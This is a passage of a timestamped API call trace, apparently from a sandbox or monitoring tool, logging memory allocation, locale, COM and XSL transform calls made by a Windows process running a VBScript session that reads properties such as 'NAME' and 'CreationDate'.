[0406.702] memcpy (in: _Dst=0x34f5ac, _Src=0x20f64c, _Size=0x1e | out: _Dst=0x34f5ac) returned 0x34f5ac
[0406.703] memcpy (in: _Dst=0x34f5fc, _Src=0x20f64c, _Size=0x12 | out: _Dst=0x34f5fc) returned 0x34f5fc
[0406.703] malloc (_Size=0x4008) returned 0x353c20
[0406.703] memcpy (in: _Dst=0x34f644, _Src=0x20f64c, _Size=0x14 | out: _Dst=0x34f644) returned 0x34f644
[0406.705] memcpy (in: _Dst=0x34f68c, _Src=0x20f64c, _Size=0x2 | out: _Dst=0x34f68c) returned 0x34f68c
[0406.706] free (_Block=0x34dfd0)
[0406.706] free (_Block=0x20e5d0)
[0406.706] ??3@YAXPEAX@Z () returned 0x74007400820001
[0406.706] free (_Block=0x20f770)
[0406.707] free (_Block=0x35bf70)
[0406.707] free (_Block=0x357f60)
[0406.707] free (_Block=0x353c20)
[0406.707] free (_Block=0x351c10)
[0406.707] free (_Block=0x350c00)
[0406.707] free (_Block=0x3503f0)
[0406.707] free (_Block=0x34ffe0)
[0406.707] free (_Block=0x20fb80)
[0406.707] free (_Block=0x20a900)
[0406.707] ??2@YAPEAX_K@Z () returned 0x20e5d0
[0406.707] ??2@YAPEAX_K@Z () returned 0x20cf40
[0406.707] malloc (_Size=0x10) returned 0x209560
[0406.708] memcpy (in: _Dst=0x209560, _Src=0x16ebe0, _Size=0x10 | out: _Dst=0x209560) returned 0x209560
[0406.708] free (_Block=0x20d950)
[0406.709] GetUserDefaultLCID () returned 0x409
[0406.709] GetACP () returned 0x4e4
[0406.709] ??3@YAXPEAX@Z () returned 0x740075007e0001
[0406.709] ISystemDebugEventFire:EndSession (This=0x2d91c0) returned 0x0
[0406.709] IUnknown:Release (This=0x2d91c0) returned 0x1
[0406.710] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.710] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.710] IUnknown:Release (This=0x2d91c0) returned 0x0
[0406.710] DllRegisterServer () returned 0x0
[0406.711] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x2137620, ppProcessor=0x16f1a0 | out: ppProcessor=0x16f1a0*=0x2139640) returned 0x0
[0406.711] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x21371d0) returned 0x2
[0406.711] IXSLProcessor:put_input (This=0x2139640, input=0x16f3e0*(varType=0x9, wReserved1=0xf43b, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x21371d0, varVal2=0x1)) returned 0x0
[0406.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0406.712] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x60, lpConsoleScreenBufferInfo=0x16f0a0 | out: lpConsoleScreenBufferInfo=0x16f0a0) returned 0
[0406.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x60
[0406.712] GetFileType (hFile=0x60) returned 0x3
[0406.712] IXSLProcessor:transform (in: This=0x2139640, pDone=0x16f458 | out: pDone=0x16f458*=0xffff) returned 0x0
[0406.735] GetCurrentThreadId () returned 0xdf0
[0406.735] ??2@YAPEAX_K@Z () returned 0x20d7f0
[0406.735] ??2@YAPEAX_K@Z () returned 0x208740
[0406.735] GetCurrentThreadId () returned 0xdf0
[0406.735] ??2@YAPEAX_K@Z () returned 0x20d8c0
[0406.735] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0406.736] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x16eec0, cchData=6 | out: lpLCData="1252") returned 5
[0406.736] IsValidCodePage (CodePage=0x4e4) returned 1
[0406.736] DllRegisterServer () returned 0x0
[0406.736] CoCreateInstance (in: rclsid=0x7fef4b4d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef4b4d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x20e588 | out: ppv=0x20e588*=0x2d91c0) returned 0x0
[0406.737] IUnknown:AddRef (This=0x2d91c0) returned 0x2
[0406.737] GetCurrentProcessId () returned 0xdec
[0406.737] GetCurrentThreadId () returned 0xdf0
[0406.737] GetTickCount () returned 0x142f37e
[0406.737] ISystemDebugEventFire:BeginSession (This=0x2d91c0, guidSourceID=0x7fef4b4d5d8, strSessionName="VBScript:00003564:00003568:21164926") returned 0x0
[0406.737] GetCurrentThreadId () returned 0xdf0
[0406.737] ??2@YAPEAX_K@Z () returned 0x20d950
[0406.738] ??2@YAPEAX_K@Z () returned 0x209040
[0406.739] ??2@YAPEAX_K@Z () returned 0x20d9a0
[0406.739] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.742] malloc (_Size=0x988) returned 0x20e630
[0406.742] GetCurrentThreadId () returned 0xdf0
[0406.742] DllRegisterServer () returned 0x0
[0406.743] ??2@YAPEAX_K@Z () returned 0x20d9f0
[0406.779] ??2@YAPEAX_K@Z () returned 0x20efc0
[0406.779] malloc (_Size=0x80) returned 0x20f0c0
[0406.779] malloc (_Size=0x108) returned 0x20a900
[0406.779] memcpy (in: _Dst=0x20a948, _Src=0x35c468, _Size=0x1a | out: _Dst=0x20a948) returned 0x20a948
[0406.779] ??2@YAPEAX_K@Z () returned 0x20f150
[0406.780] memcpy (in: _Dst=0x20a9a8, _Src=0x35c48c, _Size=0xc | out: _Dst=0x20a9a8) returned 0x20a9a8
[0406.780] ??2@YAPEAX_K@Z () returned 0x20f1a0
[0406.780] malloc (_Size=0x208) returned 0x20f1f0
[0406.781] memcpy (in: _Dst=0x20f238, _Src=0x35c4a0, _Size=0x18 | out: _Dst=0x20f238) returned 0x20f238
[0406.781] ??2@YAPEAX_K@Z () returned 0x20f400
[0406.781] memcpy (in: _Dst=0x20f290, _Src=0x35c4c0, _Size=0x14 | out: _Dst=0x20f290) returned 0x20f290
[0406.781] ??2@YAPEAX_K@Z () returned 0x20f450
[0406.782] memcpy (in: _Dst=0x20f2e8, _Src=0x35c4dc, _Size=0x1c | out: _Dst=0x20f2e8) returned 0x20f2e8
[0406.782] ??2@YAPEAX_K@Z () returned 0x20f4a0
[0406.783] memcpy (in: _Dst=0x20f348, _Src=0x35c500, _Size=0x14 | out: _Dst=0x20f348) returned 0x20f348
[0406.783] GetCurrentThreadId () returned 0xdf0
[0406.783] memcpy (in: _Dst=0x20f3a0, _Src=0x35c51c, _Size=0xc | out: _Dst=0x20f3a0) returned 0x20f3a0
[0406.783] GetCurrentThreadId () returned 0xdf0
[0406.784] malloc (_Size=0x408) returned 0x20f4f0
[0406.784] memcpy (in: _Dst=0x20f538, _Src=0x35c530, _Size=0x12 | out: _Dst=0x20f538) returned 0x20f538
[0406.790] GetCurrentThreadId () returned 0xdf0
[0406.790] memcpy (in: _Dst=0x20f590, _Src=0x35c54c, _Size=0xe | out: _Dst=0x20f590) returned 0x20f590
[0406.791] GetCurrentThreadId () returned 0xdf0
[0406.791] memcpy (in: _Dst=0x20f5e0, _Src=0x35c564, _Size=0x6 | out: _Dst=0x20f5e0) returned 0x20f5e0
[0406.791] GetCurrentThreadId () returned 0xdf0
[0406.792] memcpy (in: _Dst=0x20f628, _Src=0x35c574, _Size=0xc | out: _Dst=0x20f628) returned 0x20f628
[0406.792] GetCurrentThreadId () returned 0xdf0
[0406.792] memcpy (in: _Dst=0x20f678, _Src=0x35c588, _Size=0x12 | out: _Dst=0x20f678) returned 0x20f678
[0406.792] GetCurrentThreadId () returned 0xdf0
[0406.793] memcpy (in: _Dst=0x20f6d0, _Src=0x35c5a4, _Size=0x14 | out: _Dst=0x20f6d0) returned 0x20f6d0
[0406.793] GetCurrentThreadId () returned 0xdf0
[0406.793] memcpy (in: _Dst=0x20f728, _Src=0x35c5c0, _Size=0xa | out: _Dst=0x20f728) returned 0x20f728
[0406.793] GetCurrentThreadId () returned 0xdf0
[0406.794] memcpy (in: _Dst=0x20f778, _Src=0x35c5d4, _Size=0x1a | out: _Dst=0x20f778) returned 0x20f778
[0406.794] ??2@YAPEAX_K@Z () returned 0x20f900
[0406.981] GetCurrentThreadId () returned 0xdf0
[0406.981] DllRegisterServer () returned 0x0
[0406.981] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.981] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.982] GetCurrentThreadId () returned 0xdf0
[0406.983] DllRegisterServer () returned 0x0
[0406.984] GetCurrentThreadId () returned 0xdf0
[0406.984] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0406.984] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0406.984] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0406.984] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0406.984] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.984] malloc (_Size=0x1008) returned 0x360440
[0406.985] ??2@YAPEAX_K@Z () returned 0x361450
[0406.985] malloc (_Size=0x2008) returned 0x3615e0
[0406.985] memcpy (in: _Dst=0x361614, _Src=0x2591a50, _Size=0x18 | out: _Dst=0x361614) returned 0x361614
[0406.985] malloc (_Size=0x108) returned 0x20aa10
[0406.985] memcpy (in: _Dst=0x361664, _Src=0x2591a6a, _Size=0x8 | out: _Dst=0x361664) returned 0x361664
[0406.985] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.985] malloc (_Size=0x208) returned 0x3635f0
[0406.986] malloc (_Size=0x40) returned 0x20d9a0
[0406.986] malloc (_Size=0x138) returned 0x20fe90
[0406.986] memcpy (in: _Dst=0x20fe90, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x20fe90) returned 0x20fe90
[0406.986] memcpy (in: _Dst=0x20fec8, _Src=0x361664, _Size=0xa | out: _Dst=0x20fec8) returned 0x20fec8
[0406.986] memcpy (in: _Dst=0x20fedc, _Src=0x361614, _Size=0x1a | out: _Dst=0x20fedc) returned 0x20fedc
[0406.986] memcpy (in: _Dst=0x20fef8, _Src=0x0, _Size=0x0 | out: _Dst=0x20fef8) returned 0x20fef8
[0406.986] memcpy (in: _Dst=0x20fef8, _Src=0x20d9a0, _Size=0x8 | out: _Dst=0x20fef8) returned 0x20fef8
[0406.986] memcpy (in: _Dst=0x20ff08, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x20ff08) returned 0x20ff08
[0406.986] memcpy (in: _Dst=0x20ff28, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x20ff28) returned 0x20ff28
[0406.986] memcpy (in: _Dst=0x20ff58, _Src=0x2591a50, _Size=0x24 | out: _Dst=0x20ff58) returned 0x20ff58
[0406.986] memcpy (in: _Dst=0x20ff80, _Src=0x363610, _Size=0x30 | out: _Dst=0x20ff80) returned 0x20ff80
[0406.987] memcpy (in: _Dst=0x20ffb0, _Src=0x36364c, _Size=0x13 | out: _Dst=0x20ffb0) returned 0x20ffb0
[0406.987] ??2@YAPEAX_K@Z () returned 0x2095a0
[0406.987] free (_Block=0x3615e0)
[0406.987] free (_Block=0x360440)
[0406.987] ??3@YAXPEAX@Z () returned 0x74007600820001
[0406.987] free (_Block=0x20d9a0)
[0406.987] free (_Block=0x3635f0)
[0406.989] free (_Block=0x20aa10)
[0406.989] ??2@YAPEAX_K@Z () returned 0x360440
[0406.989] realloc (_Block=0x209560, _Size=0x40) returned 0x20d9a0
[0406.989] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0406.990] ??2@YAPEAX_K@Z () returned 0x3604a0
[0406.991] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.991] GetCurrentThreadId () returned 0xdf0
[0406.991] DllRegisterServer () returned 0x0
[0406.992] memcpy (in: _Dst=0x20f7d8, _Src=0x20fec8, _Size=0xa | out: _Dst=0x20f7d8) returned 0x20f7d8
[0406.994] GetCurrentThreadId () returned 0xdf0
[0406.994] DllRegisterServer () returned 0x0
[0406.995] ??3@YAXPEAX@Z () returned 0x4d01
[0406.995] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0406.995] free (_Block=0x20fe90)
[0406.995] ??3@YAXPEAX@Z () returned 0x20016400580001
[0406.995] ??3@YAXPEAX@Z () returned 0x4d01
[0406.996] free (_Block=0x20fdc0)
[0406.996] GetCurrentThreadId () returned 0xdf0
[0406.996] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0406.996] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0406.997] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0406.997] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0406.997] ??2@YAPEAX_K@Z () returned 0x2087c0
[0406.997] malloc (_Size=0x1008) returned 0x360440
[0406.997] ??2@YAPEAX_K@Z () returned 0x361450
[0406.997] malloc (_Size=0x2008) returned 0x3615e0
[0406.997] memcpy (in: _Dst=0x361614, _Src=0x2591b20, _Size=0x16 | out: _Dst=0x361614) returned 0x361614
[0406.998] malloc (_Size=0x108) returned 0x20aa10
[0406.998] ??3@YAXPEAX@Z () returned 0x55f9f701
[0406.998] malloc (_Size=0x208) returned 0x3635f0
[0406.998] malloc (_Size=0x40) returned 0x20fe90
[0406.998] malloc (_Size=0x110) returned 0x361450
[0406.998] memcpy (in: _Dst=0x361450, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361450) returned 0x361450
[0406.998] memcpy (in: _Dst=0x361488, _Src=0x361614, _Size=0x18 | out: _Dst=0x361488) returned 0x361488
[0406.998] memcpy (in: _Dst=0x3614a0, _Src=0x0, _Size=0x0 | out: _Dst=0x3614a0) returned 0x3614a0
[0406.998] memcpy (in: _Dst=0x3614a0, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x3614a0) returned 0x3614a0
[0406.998] memcpy (in: _Dst=0x3614b0, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x3614b0) returned 0x3614b0
[0406.998] memcpy (in: _Dst=0x3614d0, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x3614d0) returned 0x3614d0
[0406.999] memcpy (in: _Dst=0x361500, _Src=0x2591b20, _Size=0x1a | out: _Dst=0x361500) returned 0x361500
[0406.999] memcpy (in: _Dst=0x361520, _Src=0x363610, _Size=0x30 | out: _Dst=0x361520) returned 0x361520
[0406.999] memcpy (in: _Dst=0x361550, _Src=0x36364c, _Size=0xe | out: _Dst=0x361550) returned 0x361550
[0406.999] ??2@YAPEAX_K@Z () returned 0x2095a0
[0406.999] free (_Block=0x3615e0)
[0406.999] free (_Block=0x360440)
[0406.999] ??3@YAXPEAX@Z () returned 0x74007700820001
[0406.999] free (_Block=0x20fe90)
[0406.999] free (_Block=0x3635f0)
[0406.999] free (_Block=0x20aa10)
[0406.999] ??2@YAPEAX_K@Z () returned 0x20fe90
[0406.999] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.000] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.001] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.001] GetCurrentThreadId () returned 0xdf0
[0407.001] DllRegisterServer () returned 0x0
[0407.003] GetCurrentThreadId () returned 0xdf0
[0407.003] DllRegisterServer () returned 0x0
[0407.003] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.003] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.003] free (_Block=0x361450)
[0407.004] ??3@YAXPEAX@Z () returned 0x20016500580001
[0407.004] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.004] free (_Block=0x20fdc0)
[0407.004] GetCurrentThreadId () returned 0xdf0
[0407.004] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0407.004] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0407.004] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0407.004] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0407.005] ??2@YAPEAX_K@Z () returned 0x2087c0
[0407.005] malloc (_Size=0x1008) returned 0x360440
[0407.005] ??2@YAPEAX_K@Z () returned 0x361450
[0407.005] malloc (_Size=0x2008) returned 0x3615e0
[0407.005] memcpy (in: _Dst=0x361614, _Src=0x2591cd0, _Size=0x12 | out: _Dst=0x361614) returned 0x361614
[0407.005] malloc (_Size=0x108) returned 0x20aa10
[0407.005] memcpy (in: _Dst=0x36165c, _Src=0x2591ce4, _Size=0x8 | out: _Dst=0x36165c) returned 0x36165c
[0407.005] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.005] malloc (_Size=0x208) returned 0x3635f0
[0407.006] malloc (_Size=0x40) returned 0x20fe90
[0407.006] malloc (_Size=0x128) returned 0x361450
[0407.006] memcpy (in: _Dst=0x361450, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361450) returned 0x361450
[0407.006] memcpy (in: _Dst=0x361488, _Src=0x36165c, _Size=0xa | out: _Dst=0x361488) returned 0x361488
[0407.006] memcpy (in: _Dst=0x36149c, _Src=0x361614, _Size=0x14 | out: _Dst=0x36149c) returned 0x36149c
[0407.006] memcpy (in: _Dst=0x3614b0, _Src=0x0, _Size=0x0 | out: _Dst=0x3614b0) returned 0x3614b0
[0407.006] memcpy (in: _Dst=0x3614b0, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x3614b0) returned 0x3614b0
[0407.006] memcpy (in: _Dst=0x3614c0, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x3614c0) returned 0x3614c0
[0407.006] memcpy (in: _Dst=0x3614e0, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x3614e0) returned 0x3614e0
[0407.006] memcpy (in: _Dst=0x361510, _Src=0x2591cd0, _Size=0x1e | out: _Dst=0x361510) returned 0x361510
[0407.006] memcpy (in: _Dst=0x361530, _Src=0x363610, _Size=0x30 | out: _Dst=0x361530) returned 0x361530
[0407.007] memcpy (in: _Dst=0x361560, _Src=0x36364c, _Size=0x13 | out: _Dst=0x361560) returned 0x361560
[0407.007] ??2@YAPEAX_K@Z () returned 0x2095a0
[0407.007] free (_Block=0x3615e0)
[0407.007] free (_Block=0x360440)
[0407.007] ??3@YAXPEAX@Z () returned 0x74007800820001
[0407.007] free (_Block=0x20fe90)
[0407.007] free (_Block=0x3635f0)
[0407.007] free (_Block=0x20aa10)
[0407.007] ??2@YAPEAX_K@Z () returned 0x20fe90
[0407.007] memcpy (in: _Dst=0x20d9b0, _Src=0x16ec40, _Size=0x10 | out: _Dst=0x20d9b0) returned 0x20d9b0
[0407.008] ??2@YAPEAX_K@Z () returned 0x20fef0
[0407.008] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.009] GetCurrentThreadId () returned 0xdf0
[0407.009] DllRegisterServer () returned 0x0
[0407.011] IUnknown:QueryInterface (in: This=0x21357c0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db40 | out: ppvObject=0x16db40*=0x21357f0) returned 0x0
[0407.012] IUnknown:Release (This=0x21357c0) returned 0x1
[0407.012] IUnknown:QueryInterface (in: This=0x21357f0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16de40 | out: ppvObject=0x16de40*=0x21357f0) returned 0x0
[0407.012] IDispatchEx:GetDispId (in: This=0x21357f0, bstrName="GetNamedItem", grfdex=0x8, pid=0x16dda8 | out: pid=0x16dda8*=83) returned 0x0
[0407.012] IUnknown:Release (This=0x21357f0) returned 0x1
[0407.012] IUnknown:AddRef (This=0x21357f0) returned 0x2
[0407.012] IUnknown:QueryInterface (in: This=0x21357f0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db30 | out: ppvObject=0x16db30*=0x21357f0) returned 0x0
[0407.012] ??2@YAPEAX_K@Z () returned 0x20ff40
[0407.013] IDispatchEx:InvokeEx (in: This=0x21357f0, id=83, lcid=0x409, wFlags=0x3, pdp=0x16db08*(rgvarg=([0]=0x20ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0x16dd48, pei=0x16db50, pspCaller=0x20ff40 | out: pdp=0x16db08*(rgvarg=([0]=0x20ecd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NAME", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarRes=0x16dd48*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x213a280, varVal2=0x0), pei=0x16db50*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0407.013] IUnknown:Release (This=0x21357f0) returned 0x2
[0407.013] IUnknown:Release (This=0x21357f0) returned 0x1
[0407.013] IUnknown:QueryInterface (in: This=0x213a280, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db40 | out: ppvObject=0x16db40*=0x213a2b0) returned 0x0
[0407.014] IUnknown:Release (This=0x213a280) returned 0x1
[0407.014] IUnknown:QueryInterface (in: This=0x213a2b0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16de58 | out: ppvObject=0x16de58*=0x213a2b0) returned 0x0
[0407.014] IDispatchEx:GetDispId (in: This=0x213a2b0, bstrName="Value", grfdex=0x8, pid=0x16ddac | out: pid=0x16ddac*=120) returned 0x0
[0407.014] IUnknown:Release (This=0x213a2b0) returned 0x1
[0407.015] IUnknown:AddRef (This=0x213a2b0) returned 0x2
[0407.015] IUnknown:QueryInterface (in: This=0x213a2b0, riid=0x7fef4b4d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x16db30 | out: ppvObject=0x16db30*=0x213a2b0) returned 0x0
[0407.015] IDispatchEx:InvokeEx (in: This=0x213a2b0, id=120, lcid=0x409, wFlags=0x3, pdp=0x16db08*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x20ece8, pei=0x16db50, pspCaller=0x20ff40 | out: pdp=0x16db08*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarRes=0x20ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate", varVal2=0x0), pei=0x16db50*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0)) returned 0x0
[0407.015] IUnknown:Release (This=0x213a2b0) returned 0x2
[0407.015] IUnknown:Release (This=0x213a2b0) returned 0x1
[0407.021] memcpy (in: _Dst=0x20f828, _Src=0x7fef4b61978, _Size=0x10 | out: _Dst=0x20f828) returned 0x20f828
[0407.021] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Array", cchCount2=14) returned 1
[0407.023] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="PROPERTY", cchCount1=8, lpString2="Property.Reference", cchCount2=18) returned 1
[0407.024] memcpy (in: _Dst=0x20f878, _Src=0x7fef4b63a60, _Size=0xa | out: _Dst=0x20f878) returned 0x20f878
[0407.024] memcpy (in: _Dst=0x20f8c8, _Src=0x7fef4b62208, _Size=0x10 | out: _Dst=0x20f8c8) returned 0x20f8c8
[0407.026] memcpy (in: _Dst=0x2c6228, _Src=0x2c6958, _Size=0x32 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.026] malloc (_Size=0x808) returned 0x360440
[0407.026] memcpy (in: _Dst=0x360488, _Src=0x7fef4b63b10, _Size=0xa | out: _Dst=0x360488) returned 0x360488
[0407.026] memcpy (in: _Dst=0x304c58, _Src=0x2c6958, _Size=0x32 | out: _Dst=0x304c58) returned 0x304c58
[0407.027] GetCurrentThreadId () returned 0xdf0
[0407.027] DllRegisterServer () returned 0x0
[0407.028] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.028] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.028] free (_Block=0x361450)
[0407.028] ??3@YAXPEAX@Z () returned 0x20016600580001
[0407.028] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.029] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.029] free (_Block=0x20fdc0)
[0407.029] GetCurrentThreadId () returned 0xdf0
[0407.029] realloc (_Block=0x0, _Size=0xc8) returned 0x20fdc0
[0407.029] memcpy (in: _Dst=0x20fdc0, _Src=0x7fef4b60800, _Size=0x10 | out: _Dst=0x20fdc0) returned 0x20fdc0
[0407.029] memcpy (in: _Dst=0x20fdd0, _Src=0x7fef4b4f2c8, _Size=0x6 | out: _Dst=0x20fdd0) returned 0x20fdd0
[0407.029] memcpy (in: _Dst=0x20fdd6, _Src=0x7fef4b4f2d0, _Size=0x18 | out: _Dst=0x20fdd6) returned 0x20fdd6
[0407.029] ??2@YAPEAX_K@Z () returned 0x2087c0
[0407.030] malloc (_Size=0x1008) returned 0x360c50
[0407.030] ??2@YAPEAX_K@Z () returned 0x361c60
[0407.030] malloc (_Size=0x2008) returned 0x361df0
[0407.030] memcpy (in: _Dst=0x361e24, _Src=0x2591960, _Size=0x1a | out: _Dst=0x361e24) returned 0x361e24
[0407.030] malloc (_Size=0x108) returned 0x20aa10
[0407.030] memcpy (in: _Dst=0x361e74, _Src=0x259197c, _Size=0x8 | out: _Dst=0x361e74) returned 0x361e74
[0407.030] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.030] malloc (_Size=0x208) returned 0x363e00
[0407.031] malloc (_Size=0x40) returned 0x20fe90
[0407.031] malloc (_Size=0x138) returned 0x361c60
[0407.031] memcpy (in: _Dst=0x361c60, _Src=0x16e7a0, _Size=0x30 | out: _Dst=0x361c60) returned 0x361c60
[0407.031] memcpy (in: _Dst=0x361c98, _Src=0x361e74, _Size=0xa | out: _Dst=0x361c98) returned 0x361c98
[0407.031] memcpy (in: _Dst=0x361cac, _Src=0x361e24, _Size=0x1c | out: _Dst=0x361cac) returned 0x361cac
[0407.031] memcpy (in: _Dst=0x361cc8, _Src=0x0, _Size=0x0 | out: _Dst=0x361cc8) returned 0x361cc8
[0407.031] memcpy (in: _Dst=0x361cc8, _Src=0x20fe90, _Size=0x8 | out: _Dst=0x361cc8) returned 0x361cc8
[0407.031] memcpy (in: _Dst=0x361cd8, _Src=0x16ed60, _Size=0x20 | out: _Dst=0x361cd8) returned 0x361cd8
[0407.032] memcpy (in: _Dst=0x361cf8, _Src=0x20fdc0, _Size=0x30 | out: _Dst=0x361cf8) returned 0x361cf8
[0407.032] memcpy (in: _Dst=0x361d28, _Src=0x2591960, _Size=0x26 | out: _Dst=0x361d28) returned 0x361d28
[0407.032] memcpy (in: _Dst=0x361d50, _Src=0x363e20, _Size=0x30 | out: _Dst=0x361d50) returned 0x361d50
[0407.032] memcpy (in: _Dst=0x361d80, _Src=0x363e5c, _Size=0x13 | out: _Dst=0x361d80) returned 0x361d80
[0407.032] ??2@YAPEAX_K@Z () returned 0x2095a0
[0407.032] free (_Block=0x361df0)
[0407.032] free (_Block=0x360c50)
[0407.032] ??3@YAXPEAX@Z () returned 0x74007900820001
[0407.032] free (_Block=0x20fe90)
[0407.032] free (_Block=0x363e00)
[0407.032] free (_Block=0x20aa10)
[0407.032] ??2@YAPEAX_K@Z () returned 0x20fe90
